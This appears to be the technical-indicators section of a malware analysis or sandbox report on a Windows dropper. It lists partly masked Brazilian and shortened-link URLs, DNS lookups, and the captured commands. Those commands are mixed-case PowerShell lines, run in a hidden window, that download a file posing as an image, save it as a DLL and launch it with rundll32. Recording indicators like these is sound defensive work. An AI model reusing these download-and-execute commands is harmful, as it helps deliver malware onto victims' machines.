Technical Information
- http://www.fa######l2016.xpg.com.br/site/img001.jpg as %allusersprofile%\bfczqtsagf_user\bfczqtsagf_user_suuof.dll
- http://bi#.ly/1kb1wrh
- http://bi#.ly/1kB1wrh
- http://www.go###e.com.br/leelee2016.aspx
- DNS ASK bi#.ly
- DNS ASK fa######l2016.xpg.com.br
- DNS ASK go###e.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (NEw-objEct systEM.NEt.wEbcLiENt).dowNLoadfiLE('""http://www.fa######l2016.xpg.com.br/site/img001.jpg','%ALLUSERSPROFILE%\bfczqtsagf_user\bfczqtsagf_user_suuof.dLL');start-procEss ruNdLL32.ExE ...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (NEw-objEct NEt.wEbcLiENt).dowNLoadstriNg('http://bi#.ly/1kB1wrh')"' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %ALLUSERSPROFILE%\bfczqtsagf_user\bfczqtsagf_user_suuof.dLL dlgProc